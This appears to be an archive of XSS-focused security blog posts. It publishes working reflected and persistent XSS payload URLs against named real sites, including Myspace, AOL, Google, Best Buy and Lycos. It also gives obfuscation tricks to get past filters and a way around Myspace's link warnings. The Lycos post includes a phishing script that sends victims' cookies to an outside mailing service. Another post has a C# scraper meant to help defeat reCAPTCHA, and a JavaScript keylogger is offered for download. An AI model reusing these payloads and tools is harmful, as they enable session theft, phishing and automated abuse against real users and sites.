Start the server, view Test1.htm or Test2.htm, and type in one of the inputs to see it in action. Logged keystrokes are displayed in the console and written to a text file in the same directory as the server. Server settings are in the JavascriptKeyloggerServer.exe.config file.

Download 1

Download 2

Javascript Keylogger

2010-03-10T21:21:00.000-08:00

I wrote a javascript keylogger that works nicely with XSS vulnerabilities.

Download 1

Download 2

Scraping - reCAPTCHA Hack

2010-03-02T22:06:00.001-08:00

After reading about the $25 million online ticket heist and the involvement of the reCAPTCHA service I decided to see if the reported flaw was still present. From the article:

[The perpetrators] wrote a script that impersonated users trying to access Facebook, and downloaded hundreds of thousands of possible CAPTCHA challenges from reCAPTCHA. They identified the file ID of each CAPTCHA challenge and created a database of CAPTCHA “answers” to correspond to each ID. The bot would then identify the file ID of a challenge at Ticketmaster and feed back the corresponding answer.

If the writer was referring to the ID passed to http://api.recaptcha.net/image via query string, the vulnerability appears to be fixed as the ID is temporary. However, the images are still the same and through the use of a cryptographic hash function such as MD5 we can identify duplicates. The following C# console application downloads a number (specified by the imageCount variable) of CAPTCHA images from reCAPTCHA, hashes each, groups the results by hash, then writes the results to a text file. Downloading as few as 1024 images can yield several identical images. Building on this one could potentially pull off the reCAPTCHA attack described in the article.


using System;
using System.Text;
using System.Text.RegularExpressions;
using System.IO;
using System.Net;
using System.Collections.Generic;
using System.Security.Cryptography;

namespace reCAPTCHAScrape
{
    class Program
    {
        static string Request(string Url)
        {
            HttpWebRequest request = WebRequest.Create(Url) as HttpWebRequest;

            string s;

            using (StreamReader reader =
                new StreamReader(request.GetResponse().GetResponseStream()))
                s = reader.ReadToEnd();

            return s;
        }

        static void GetCaptchaImage(int FileNum)
        {
            Regex scriptURLRegex =
                new Regex(@"<script\s*type\s*=\s*""text/javascript""\s*" +
                    @"src\s*=\s*""([^""]+)""\s*><\s*/script>");

            Regex scriptRegex = new Regex(@"challenge\s*:\s*'([^']+)'");

            string pageURL = "http://recaptcha.net/fastcgi/demo/recaptcha";

            string resp = Request(pageURL);

            string scriptURL = scriptURLRegex.Match(resp).Groups[1].Value;

            resp = Request(scriptURL);

            string ID = scriptRegex.Match(resp).Groups[1].Value;

            string imageURL = "http://api.recaptcha.net/image?c=" + ID;

            HttpWebRequest request =
                WebRequest.Create(imageURL) as HttpWebRequest;

            byte[] buffer = new byte[1048576];

            using (Stream s = request.GetResponse().GetResponseStream())
            {
                int len = s.Read(buffer, 0, 1048576);

                Array.Resize(ref buffer, len);
            }

            using (FileStream stream = File.Create(FileNum + ".jpg"))
                stream.Write(buffer, 0, buffer.Length);
        }

        static void DigestImages(string Path)
        {
            DirectoryInfo info = new DirectoryInfo(Path);

            FileInfo[] files = info.GetFiles("*.jpg");

            MD5CryptoServiceProvider md5 = new MD5CryptoServiceProvider();

            Dictionary<string, List<FileInfo>> digestDictionary =
                new Dictionary<string, List<FileInfo>>();

            foreach (FileInfo f in files)
            {
                byte[] buffer = File.ReadAllBytes(f.FullName);

                byte[] digest = md5.ComputeHash(buffer);

                StringBuilder hexStringBuilder = new StringBuilder();

                foreach (byte b in digest)
                    hexStringBuilder.Append(Convert.ToString(b,
                        16).PadLeft(2, '0'));

                string hexString = hexStringBuilder.ToString();

                if (digestDictionary.ContainsKey(hexString))                
                    digestDictionary[hexString].Add(f);
                else
                    digestDictionary.Add(hexString, new List<FileInfo>() { f });
            }

            StringBuilder results = new StringBuilder();

            foreach (string s in digestDictionary.Keys)
            {
                results.AppendLine(s);

                foreach (FileInfo f in digestDictionary[s])
                    results.AppendLine(f.FullName);

                results.AppendLine();
            }

            string filename = @".\Results_" + Environment.TickCount + ".txt";

            File.WriteAllText(filename, results.ToString());                        
        }

        static void Main(string[] args)
        {
            const int imageCount = 1024;

            Console.Write("Downloading images");

            for (int i = 0; i < imageCount; i++)
            {
                try
                {
                    GetCaptchaImage(i);

                    Console.Write(".");
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine(ex.ToString());
                }
            }

            Console.WriteLine("\r\nSearching for matches...");

            DigestImages(@".\");

            Console.WriteLine("Complete. Press any key to continue...");
            Console.ReadKey();
        }
    }
}

A match in the output looks like this:


cf75401ef23c167260aa6d93bb7fbc42
C:\Source\reCAPTCHAScrape\reCAPTCHAScrape\bin\Debug\533.jpg
C:\Source\reCAPTCHAScrape\reCAPTCHAScrape\bin\Debug\869.jpg

Free Rein - MLive.com

2009-11-02T13:47:00.000-08:00

MLive's profile system has no XSS protection. HTML of any sort can be entered in the About Me field.

http://connect.mlive.com/user/XSSBlog/index.html

More Reflected XSS - AOL.com

2009-11-02T13:28:00.000-08:00

More of the same.

http://messageboards.aol.com/aol/en_us/search.php?search="style="position:absolute;top:0;left:-500px;width:9999px;height:9999px;"onmouseover="alert(0)&boardId=519911&search_all=0&search_type=2

http://finance.aol.com/lookup/"style="width:9999px;height:9999px;"onmouseover="alert(0)">/usa

And of course being a myspace white listed site these can be used to get around msplinks.

http://www.msplinks.com/MDFodHRwOi8vbWVzc2FnZWJvYXJkcy5hb2wuY29tL2FvbC9lbl91cy9zZWFyY2gucGhwP3NlYXJjaD0lMjJzdHlsZT0lMjJwb3NpdGlvbjphYnNvbHV0ZTt0b3A6MDtsZWZ0Oi01MDBweDt3aWR0aDo5OTk5cHg7aGVpZ2h0Ojk5OTlweDslMjJvbm1vdXNlb3Zlcj0lMjJ3aW5kb3cubG9jYXRpb249J2h0dHA6Ly9jcm9zcy1zaXRlLXNjcmlwdGluZy5ibG9nc3BvdC5jb20nJmJvYXJkSWQ9NTE5OTExJnNlYXJjaF9hbGw9MCZzZWFyY2hfdHlwZT0y

Bypassing Msplinks.com Revisited - Myspace.com

2009-10-04T15:50:00.000-07:00

The technique I previously blogged about still works, but ytmnd.com has fixed the XSS vulnerability used in that posting. Here's a hole in another Msplinks.com whitelisted site:

http://www.canada.com/search/search.html?q=')}window.location='http://cross-site-scripting.blogspot.com/';{('

Just as before 01 is prefixed to the XSS redirect URL, then the result is Base64 encoded and appended to http://www.msplinks.com/.

http://www.msplinks.com/MDFodHRwOi8vd3d3LmNhbmFkYS5jb20vc2VhcmNoL3NlYXJjaC5odG1sP3E9Jyl9d2luZG93LmxvY2F0aW9uPSdodHRwOi8vY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuYmxvZ3Nwb3QuY29tLyc7eygn

Persistent XSS Vulnerability - Google.com

2009-09-30T18:25:00.001-07:00

Here's a good one: Google Sidewiki has a type 2 XSS vulnerability. Upon editing an entry (and possibly when adding one, I didn't test it) an HTTP proxy such as Fiddler can be used to alter the pagetitle field.

The code replacing the pagetitle value is as follows.

<<a>a onmouseout=alert(0)>a

The a tag is stripped out, but as only one pass is performed a new a tag is created.

<a onmouseout=alert(0)>a

The result is a profile containing the arbitrary code.

http://www.google.com/profiles/108489460074237220044?hl=en#sidewiki

Persistent XSS Vulnerability - IntenseDebate.com

2009-09-25T14:45:00.000-07:00

The profile description field of Intense Debate has a type 2 XSS vulnerability. Using it, arbitrary code can be run when the affected profile is viewed or when the mouse cursor is over the avatar present next to comments posted by the account.

<a style="position:absolute;top:-500px;left:-500px;width:9999px;height:9999px;" onmouseover="alert(0)"></a>

http://intensedebate.com/people/JohnnyCake5

http://www.woodtv.com/dpp/your_money/wall_street/Stocks_End_Low_As_Healthcare_Recovers_2887663#IDComment35942133

Persistent XSS Vulnerability - AssociatedContent.com

2009-09-19T13:40:00.000-07:00

Several of the fields of Associated Content profile system have persistent XSS vulnerabilities. Such a vulnerability could be used to craft a rather nasty worm.

The code shown in the screenshots is as follows:

"style="position:absolute;top:0;left:0;width:9999px;height:9999px;"onmouseover="alert(0)

http://www.associatedcontent.com/user/631547/xss_blog.html

Leveraging Existing CSS - Stickam.com

2009-09-10T13:43:00.000-07:00

Stickam's filters are quite strict; attempting to inject a script tag results in an internal error page. The same thing happens with a variety of other tags, any event attribute, certain CSS property values (e.g. setting position to absolute) and even many of the site's CSS IDs and classes. But the filters miss some of the ID selectors that set the element position to absolute, and this can be utilized to cover the entire page with a link.

http://www.stickam.com/onlineMembers.do?personalTags="<a id="cboxTitle"style="height:9999px;width:9999px;"href="http://cross-site-scripting.blogspot.com"</a>

Sidestepping Filters - Craigslist.org

2009-09-07T15:02:00.000-07:00

Because the of the lack of HTML encoding, tags can be injected using the search forum search feature assuming no results are found. Testing this with H1 tags yields the expected results.

However, attempting the same thing with script results in the page being rendered only up to to the opening tag.

But by adding a single character after the closing script tag, the filter causing this behavior can be sidestepped.

http://craigslist.org/forums/?SQ=fffffffff<script>alert(0)</script>f&act=RSR&forumID=8

Exploiting The Meta Tag - Local.Myspace.com

2009-09-04T18:42:00.000-07:00

Despite the lack of HTML encoding of data passed to the vulnerable market field, tags cannot be used as sending a less than character followed by any alphabetic character redirects the user to a presumably security related error page. But by injecting the http-equiv attribute, the vulnerable meta tag can be repurposed.

http://local.myspace.com/index.cfm?fuseaction=local.hub&dma=467&market=0;http://cross-site-scripting.blogspot.com/"http-equiv="refresh"

Insecure IFrame - Myspace.com

2009-08-30T16:47:00.001-07:00

The Myspace volunteer search results are embedded in the page using an IFrame, its source set by the searchresults field of the query string. Because no checks are performed on the URL specified by the field, any can be used. The result is a hard to detect XSS vulnerability; it even works with Internet Explorer 8 despite the new anti-XSS measures.

http://www.myspace.com/volunteerspace?searchresults=http://cross-site-scripting.blogspot.com/

Bypassing Myspace IM XSS Filters - Myspace.com

2009-08-16T17:12:00.000-07:00

The filtering Myspace IM uses is rather aggressive. Regardless of context, document. is changed to document· and eval() to ..). By using percent-encoding and JavaScript escaped hex sequences this can be circumvented.

The vulnerability (only works when logged in):
http://myspace.com/index.cfm?fuseaction="};alert(0);var x={"":"

The vulnerability re-encoded to bypass IM filters:
http://myspace.com/index.cfm?fuseaction=%22};%65val('alert(document%5Cx2Ecookie)'%29;var%20x={%22%22:%22

Bypassing Msplinks.com Notifications - Myspace.com

2009-06-21T18:03:00.000-07:00

As a preventative measure Myspace.com routes all user posted links through Msplinks.com. If the linked site is not on the msplinks whitelist a notification that the user is visiting an external site is displayed, and the the user must click another link to continue. To circumvent this system, an XSS vulnerability in a whitelisted site can be used as a redirect.

Fortunately ytmnd.com has a vulnerability. By prepending 01 to an xss redirect url, base64 encoding the result, and appending it to http://www.msplinks.com/ we can create a link that can be posted on Myspace. When the user clicks this link, no external site warnings are displayed.

The vulnerable whitelisted site:
http://www.ytmnd.com/search?q="]}}};window.location='http://www.asdf.com/';{{{//

A msplinks link that redirects to the xss redirect:
http://www.msplinks.com/MDFodHRwOi8vd3d3Lnl0bW5kLmNvbS9zZWFyY2g/cT0lMjIlNUQlN0QlN0QlN0Q7d2luZG93LmxvY2F0aW9uPSdodHRwOi8vd3d3LmFzZGYuY29tLyc7JTdCJTdCJTdCLy8=

Breaking Things With Null - Classifieds.Myspace.Com

2009-06-04T23:50:00.000-07:00

Sometimes passing special characters through a query string can cause in strange behavior. Using URL encoding we can search for the null character on classifieds.myspace.com. The result is an error page notifying the user that the server is too busy, and it just so happens that the retry link has a Chrome and IE compatible XSS vulnerability.

http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);

And with styling:

http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);"style="float:left;height:999px;width:999px;margin-top:-400px

Getting The Most Out Of onmouseover - eBaumsWorld.com

2009-06-02T18:48:00.000-07:00

Getting The Most Out Of onmouseover - www.ebaumsworld.com
By styling a vulnerable element the inline onmouseover event can be nearly as effective as onload. Using the width and height CSS properties the chance of a user hovering their mouse over a vulnerable element can be greatly increased.

http://www.ebaumsworld.com/search/criteria="onmouseover="alert(0);

Prior to styling the control the injected script is only run if the user hovers over the search input in the center of the screen.

http://www.ebaumsworld.com/search/criteria="style="width:999px;height:999px;"onmouseover="alert(0);

With more screen real estate taken up by the newly styled input chances of triggering the event are better.

Making The Best Of Things - Walmartstores.com

2009-05-21T20:26:00.000-07:00

Despite the quote escaping being broken by the added backslash, the code below may seem secure. Note that the single quote character was left out of the test string; a search containing a single quote or <script> results in a 404 error.

s.pageName = "Search";
s.prop1 = "search";
s.prop7 = "testa.,:;\\"<>()[]{}";
s.prop11 = "0";
s.prop17 = "walmartstores.com";

Because of the extra backslashes necessary to use quotes, calling eval or document.write with a new string literal is not possible. And with the search string converted to lowercase, String.fromCharCode cannot be called. However, nothing is stopping us from setting s.prop7 to anything we want using hex character codes then passing it to eval or document.write. Doing so would look something like this:

http://walmartstores.com/search/?q=\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x27\x48\x65\x6C\x6C\x6F\x2C\x20\x57\x6F\x72\x6C\x64\x27\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\";document.write(s.prop7);//

Phishing With jQuery - Registration.Lycos.Com

2009-05-16T00:04:00.000-07:00

jQuery is a wonderful tool when the need to traverse the HTML DOM arises. With only a few lines of code the layout of a web page can be drastically altered. Using an XSS vulnerability and a bit of creativity we can manipulate http://registration.lycos.com, turning it into what appears to be a reactivation link that users must click to keep their accounts. When the user navigates to the page, the malicious code reads the value cookie and sends it to us using an anonymous mailing service. All of this will happen transparently as the user is waiting to be redirected to http://mail.lycos.com.

First, we need the vulnerability. https://registration.lycos.com/login.php?action=login&m_PR=27&m_CBURL=http://www.lycos.com/&m_U='/><script>alert('Hello, World');</script> will work.

Next is the jQuery. Using it we're going to alter the title and login form, then email the cookie value by appending a hidden iframe to TestDiv. The JavaScript below should fulfill these needs, mailing to you@yourdomain.com.


$(this).load(function() {
    $('title').html('Reactivation');
    $('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href="http://mail.lycos.com">http://mail.lycos.com</a>...');
    var u = 'http://send-anonymous-email.com/Record.php?email_from=someemail%40domain.com&email_to=you%40yourdomain.com&subject=Have+A+Cookie&message=' + escape(document.cookie) + '&kind=html';
    $('#TestDiv').append('<iframe style="display:none;" src="' + u + '" />');

    setTimeout("window.location='http://mail.lycos.com';", 5000);
});

To obscure our code and keep the URL short we can remove all unnecessary whitespace and append it to the end of the jQuery file. Doing so would look something like this:


[jQuery] $(this).load(function(){$('title').html('Reactivation');$('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href="http://mail.lycos.com">http://mail.lycos.com</a>...');var u='http://send-anonymous-email.com/Record.php?email_from=someemail%40domain.com&email_to=you%40yourdomain.com&subject=Have+A+Cookie&message='+escape(document.cookie)+'&kind=html';$('#TestDiv').append('<iframe style="display:none;" src="'+u+'"/>');setTimeout("window.location='http://mail.lycos.com';",5000);});

Include the modified version of jQuery using the vulnerability and the result will look like the screenshot below.

https://registration.lycos.com/login.php?action=login&m_PR=27&m_CBURL=http://www.lycos.com/&m_U='/><script src="http://www.yourdomain.com/modifiedjQuery.js"></script>

Little or No Effort - Search.Harvard.edu

2009-05-13T19:20:00.000-07:00

Given the proliferation of data driven sites, it's no surprise that XSS vulnerabilities are everywhere. What is surprising, however, is the number of high profile sites lacking countermeasures. Harvard's search page is a perfect example of this; we can easily inject a script using the oldqt field.

http://search.harvard.edu:8765/query.html?charset=iso-8859-1&qt=cross-site%20scripting&oldqt=%3Cscript%20type%3D%22text/javascript%22%20src=%22http://xss-javascript-obfuscator.googlecode.com/svn/trunk/XSSJavascriptObfuscator/test.js%22%3E%3C/script%3E

No tricks needed, all it takes is a script tag.

Injecting Script Tags Without Access to Less Than and Greater Than Characters - Bestbuy.com

2009-05-08T17:21:00.000-07:00

Many times an XSS vulnerability allows for injection of JavaScript, but will (seemingly) prohibit XHTML by encoding < and > respectively as < and >. This certainly complicates matters, but with a little effort and obfuscation we can sidestep such preventative measures. To assist in such tasks I created XSS JavaScript Obfuscator (creative name, I know).

Let's take a look at http://www.bestbuy.com/ to see what can be done with such utilities. As always the first thing we need to do is find the vulnerability. A little testing reveals that the id field is vulnerable to JavaScript injection.

http://www.bestbuy.com/site/olspage.jsp?id=testA.,:;\'"<>()[]{}&type=category

And here is the vulnerable line of JavaScript:


ForeCStdSetCookie(triggerParms["oecpp_exitPage"], "testA.,:;\'"()[]{}- page-detail-404-error", null, "/", triggerParms["domain"])

By in injecting ",null,"/",triggerParms["domain"]);var%20x%3Dnew%20Array(" we can turn the vulnerable block of code into this:


ForeCStdSetCookie(triggerParms["oecpp_exitPage"], "",null,"/",triggerParms["domain"]);var x=new Array("- page-detail-404-error", null, "/", triggerParms["domain"]);

At this point we can easily inject JavaScript

http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);alert('Hello,%20World!');var%20x%3Dnew%20Array("&type=category

But with less than and greater than characters blocked how can we include an off-site script? This is where the obfuscator comes in. To use it, we're going to have to split our attack into parts.

Url Prefix	http://www.bestbuy.com/site/olspage.jsp?id=
Url Suffix	&type=category
Attack Vector Prefix	",null,"/",triggerParms["domain"]);
Attack Vector Suffix	var x=new Array("
Code	<script type="text/javascript" src="http://xss-javascript-obfuscator.googlecode.com/svn/trunk/XSSJavascriptObfuscator/test.js"></script>

Now that we've got our attack broken up lets populate the fields of XSS JavaScript Obfuscator (embedded at the bottom of this post) and generate some links for http://www.bestbuy.com

String.fromCharCode	http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);document.write(String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,45,106,97,118,97,115,99,114,105,112,116,45,111,98,102,117,115,99,97,116,111,114,46,103,111,111,103,108,101,99,111,100,101,46,99,111,109,47,115,118,110,47,116,114,117,110,107,47,88,83,83,74,97,118,97,115,99,114,105,112,116,79,98,102,117,115,99,97,116,111,114,47,116,101,115,116,46,106,115,34,62,60,47,115,99,114,105,112,116,62));var x=new Array("&type=category
String.fromCharCode + Partial Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2Cnull%2C%22/%22%2CtriggerParms%5B%22domain%22%5D%29%3Bdocument.write%28String.fromCharCode%2860%2C115%2C99%2C114%2C105%2C112%2C116%2C32%2C116%2C121%2C112%2C101%2C61%2C34%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C34%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C120%2C115%2C115%2C45%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C45%2C111%2C98%2C102%2C117%2C115%2C99%2C97%2C116%2C111%2C114%2C46%2C103%2C111%2C111%2C103%2C108%2C101%2C99%2C111%2C100%2C101%2C46%2C99%2C111%2C109%2C47%2C115%2C118%2C110%2C47%2C116%2C114%2C117%2C110%2C107%2C47%2C88%2C83%2C83%2C74%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C79%2C98%2C102%2C117%2C115%2C99%2C97%2C116%2C111%2C114%2C47%2C116%2C101%2C115%2C116%2C46%2C106%2C115%2C34%2C62%2C60%2C47%2C115%2C99%2C114%2C105%2C112%2C116%2C62%29%29%3Bvar%20x%3Dnew%20Array%28%22&type=category
String.fromCharCode + Complete Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2c%6e%75%6c%6c%2c%22%2f%22%2c%74%72%69%67%67%65%72%50%61%72%6d%73%5b%22%64%6f%6d%61%69%6e%22%5d%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%36%30%2c%31%31%35%2c%39%39%2c%31%31%34%2c%31%30%35%2c%31%31%32%2c%31%31%36%2c%33%32%2c%31%31%36%2c%31%32%31%2c%31%31%32%2c%31%30%31%2c%36%31%2c%33%34%2c%31%31%36%2c%31%30%31%2c%31%32%30%2c%31%31%36%2c%34%37%2c%31%30%36%2c%39%37%2c%31%31%38%2c%39%37%2c%31%31%35%2c%39%39%2c%31%31%34%2c%31%30%35%2c%31%31%32%2c%31%31%36%2c%33%34%2c%33%32%2c%31%31%35%2c%31%31%34%2c%39%39%2c%36%31%2c%33%34%2c%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%32%30%2c%31%31%35%2c%31%31%35%2c%34%35%2c%31%30%36%2c%39%37%2c%31%31%38%2c%39%37%2c%31%31%35%2c%39%39%2c%31%31%34%2c%31%30%35%2c%31%31%32%2c%31%31%36%2c%34%35%2c%31%31%31%2c%39%38%2c%31%30%32%2c%31%31%37%2c%31%31%35%2c%39%39%2c%39%37%2c%31%31%36%2c%31%31%31%2c%31%31%34%2c%34%36%2c%31%30%33%2c%31%31%31%2c%31%31%31%2c%31%30%33%2c%31%30%38%2c%31%30%31%2c%39%39%2c%31%31%31%2c%31%30%30%2c%31%30%31%2c%34%36%2c%39%39%2c%31%31%31%2c%31%30%39%2c%34%37%2c%31%31%35%2c%31%31%38%2c%31%31%30%2c%34%37%2c%31%31%36%2c%31%31%34%2c%31%31%37%2c%31%31%30%2c%31%30%37%2c%34%37%2c%38%38%2c%38%33%2c%38%33%2c%37%34%2c%39%37%2c%31%31%38%2c%39%37%2c%31%31%35%2c%39%39%2c%31%31%34%2c%31%30%35%2c%31%31%32%2c%31%31%36%2c%37%39%2c%39%38%2c%31%30%32%2c%31%31%37%2c%31%31%35%2c%39%39%2c%39%37%2c%31%31%36%2c%31%31%31%2c%31%31%34%2c%34%37%2c%31%31%36%2c%31%30%31%2c%31%31%35%2c%31%31%36%2c%34%36%2c%31%30%36%2c%31%31%35%2c%33%34%2c%36%32%2c%36%30%2c%34%37%2c%31%31%35%2c%39%39%2c%31%31%34%2c%31%30%35%2c%31%31%32%2c%31%31%36%2c%36%32%29%29%3b%76%61%72%20%78%3d%6e%65%77%20%41%72%72%61%79%28%22&type=category
Unescape Partial Encode	http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);document.write(unescape('%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//xss-javascript-obfuscator.googlecode.com/svn/trunk/XSSJavascriptObfuscator/test.js%22%3E%3C/script%3E'));var x=new Array("&type=category
Unescape Partial Encode + Partial Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2Cnull%2C%22/%22%2CtriggerParms%5B%22domain%22%5D%29%3Bdocument.write%28unescape%28%27%253Cscript%2520type%253D%2522text/javascript%2522%2520src%253D%2522http%253A//xss-javascript-obfuscator.googlecode.com/svn/trunk/XSSJavascriptObfuscator/test.js%2522%253E%253C/script%253E%27%29%29%3Bvar%20x%3Dnew%20Array%28%22&type=category
Unescape Partial Encode + Full Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2c%6e%75%6c%6c%2c%22%2f%22%2c%74%72%69%67%67%65%72%50%61%72%6d%73%5b%22%64%6f%6d%61%69%6e%22%5d%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%25%33%43%73%63%72%69%70%74%25%32%30%74%79%70%65%25%33%44%25%32%32%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%25%32%32%25%32%30%73%72%63%25%33%44%25%32%32%68%74%74%70%25%33%41%2f%2f%78%73%73%2d%6a%61%76%61%73%63%72%69%70%74%2d%6f%62%66%75%73%63%61%74%6f%72%2e%67%6f%6f%67%6c%65%63%6f%64%65%2e%63%6f%6d%2f%73%76%6e%2f%74%72%75%6e%6b%2f%58%53%53%4a%61%76%61%73%63%72%69%70%74%4f%62%66%75%73%63%61%74%6f%72%2f%74%65%73%74%2e%6a%73%25%32%32%25%33%45%25%33%43%2f%73%63%72%69%70%74%25%33%45%27%29%29%3b%76%61%72%20%78%3d%6e%65%77%20%41%72%72%61%79%28%22&type=category
Unescape Full Encode	http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);document.write(unescape('%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%78%73%73%2d%6a%61%76%61%73%63%72%69%70%74%2d%6f%62%66%75%73%63%61%74%6f%72%2e%67%6f%6f%67%6c%65%63%6f%64%65%2e%63%6f%6d%2f%73%76%6e%2f%74%72%75%6e%6b%2f%58%53%53%4a%61%76%61%73%63%72%69%70%74%4f%62%66%75%73%63%61%74%6f%72%2f%74%65%73%74%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e'));var x=new Array("&type=category
Unescape Full Encode + Partial Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2Cnull%2C%22/%22%2CtriggerParms%5B%22domain%22%5D%29%3Bdocument.write%28unescape%28%27%253c%2573%2563%2572%2569%2570%2574%2520%2574%2579%2570%2565%253d%2522%2574%2565%2578%2574%252f%256a%2561%2576%2561%2573%2563%2572%2569%2570%2574%2522%2520%2573%2572%2563%253d%2522%2568%2574%2574%2570%253a%252f%252f%2578%2573%2573%252d%256a%2561%2576%2561%2573%2563%2572%2569%2570%2574%252d%256f%2562%2566%2575%2573%2563%2561%2574%256f%2572%252e%2567%256f%256f%2567%256c%2565%2563%256f%2564%2565%252e%2563%256f%256d%252f%2573%2576%256e%252f%2574%2572%2575%256e%256b%252f%2558%2553%2553%254a%2561%2576%2561%2573%2563%2572%2569%2570%2574%254f%2562%2566%2575%2573%2563%2561%2574%256f%2572%252f%2574%2565%2573%2574%252e%256a%2573%2522%253e%253c%252f%2573%2563%2572%2569%2570%2574%253e%27%29%29%3Bvar%20x%3Dnew%20Array%28%22&type=category
Unescape Full Encode + Full Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2c%6e%75%6c%6c%2c%22%2f%22%2c%74%72%69%67%67%65%72%50%61%72%6d%73%5b%22%64%6f%6d%61%69%6e%22%5d%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%37%34%25%37%39%25%37%30%25%36%35%25%33%64%25%32%32%25%37%34%25%36%35%25%37%38%25%37%34%25%32%66%25%36%61%25%36%31%25%37%36%25%36%31%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%32%25%32%30%25%37%33%25%37%32%25%36%33%25%33%64%25%32%32%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%38%25%37%33%25%37%33%25%32%64%25%36%61%25%36%31%25%37%36%25%36%31%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%64%25%36%66%25%36%32%25%36%36%25%37%35%25%37%33%25%36%33%25%36%31%25%37%34%25%36%66%25%37%32%25%32%65%25%36%37%25%36%66%25%36%66%25%36%37%25%36%63%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%65%25%36%33%25%36%66%25%36%64%25%32%66%25%37%33%25%37%36%25%36%65%25%32%66%25%37%34%25%37%32%25%37%35%25%36%65%25%36%62%25%32%66%25%35%38%25%35%33%25%35%33%25%34%61%25%36%31%25%37%36%25%36%31%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%34%66%25%36%32%25%36%36%25%37%35%25%37%33%25%36%33%25%36%31%25%37%34%25%36%66%25%37%32%25%32%66%25%37%34%25%36%35%25%37%33%25%37%34%25%32%65%25%36%61%25%37%33%25%32%32%25%33%65%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%27%29%29%3b%76%61%72%20%78%3d%6e%65%77%20%41%72%72%61%79%28%22&type=category
Unescape Unicode	http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);document.write(unescape('%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u0020%u0074%u0079%u0070%u0065%u003d%u0022%u0074%u0065%u0078%u0074%u002f%u006a%u0061%u0076%u0061%u0073%u0063%u0072%u0069%u0070%u0074%u0022%u0020%u0073%u0072%u0063%u003d%u0022%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0078%u0073%u0073%u002d%u006a%u0061%u0076%u0061%u0073%u0063%u0072%u0069%u0070%u0074%u002d%u006f%u0062%u0066%u0075%u0073%u0063%u0061%u0074%u006f%u0072%u002e%u0067%u006f%u006f%u0067%u006c%u0065%u0063%u006f%u0064%u0065%u002e%u0063%u006f%u006d%u002f%u0073%u0076%u006e%u002f%u0074%u0072%u0075%u006e%u006b%u002f%u0058%u0053%u0053%u004a%u0061%u0076%u0061%u0073%u0063%u0072%u0069%u0070%u0074%u004f%u0062%u0066%u0075%u0073%u0063%u0061%u0074%u006f%u0072%u002f%u0074%u0065%u0073%u0074%u002e%u006a%u0073%u0022%u003e%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e'));var x=new Array("&type=category
